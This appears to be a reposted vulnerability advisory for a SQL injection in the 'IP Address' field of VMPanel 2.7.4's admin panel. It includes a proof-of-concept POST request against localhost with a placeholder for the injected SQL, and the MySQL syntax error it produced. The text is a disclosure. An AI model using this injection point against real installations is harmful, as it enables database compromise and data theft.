VMPanel 2.7.4 – SQL Injection Vulnerability

A remote sql injection web vulnerability has been discovered in the official VMPanel v2.7.4 web-application (cms). The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the web-application or dbms. The sql-injection web vulnerability is located in the `IP Address` entry name, that is located in the pannel administration. Remote attackers are able to run clean sql commands, the vulnerability attack vector is application-side and the injection request method is POST.

(Copy of the Vendor Homepage: http://www.cybervm.com/ )

Request Method(s):
[+] POST
Vulnerable Module(s):
[+] (Input)
Vulnerable Parameter(s):
[+] IP Address

Date of Discovery:
==================

2016-12-14

Exploitation Technique:
=======================

Web Application

Platfom Tested:
===============

Windows 7

Levels Risk :

Proof of Concept (PoC):
=======================

For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: localhost:2023
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:2023/sesswuzs6ugfaxa7ufii/index.php?act=addserver
Cookie: head_ippool=2; head_storage=2; head_servers=2; ssupp.vid=UMvYqzxZJxPU8VfwJ23WTpt5PWxnqZmYHQ45341807122016; ssupp.geoloc=%7B%22ipAddress%22%3A%22176.156.184.208%22%2C%22countryCode%22%3A%22FR%22%2C%22country%22%3A%22France%22%2C%22region%22%3Anull%2C%22city%22%3Anull%7D; WHMCS4tXQk3bQ4YHY=l8580de1p2dm64gtevt7jj15s7; SIMCookies001_sid=yd0da41j3abie5zhb8jwjsd5nk6c07ce
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
  
POST Method: server_name=&ip=[INJECTION SQL HERE]&pass=&mikip=&mikuser=&mikpass=&bw=&addserver=Add+Server
    
--- PoC Error Logs ---
SELECT * FROM `servers` WHERE `server_ip` = ''"/>>:22'
MySQL Error No : 1064
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"/>>:22'' at line 1

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*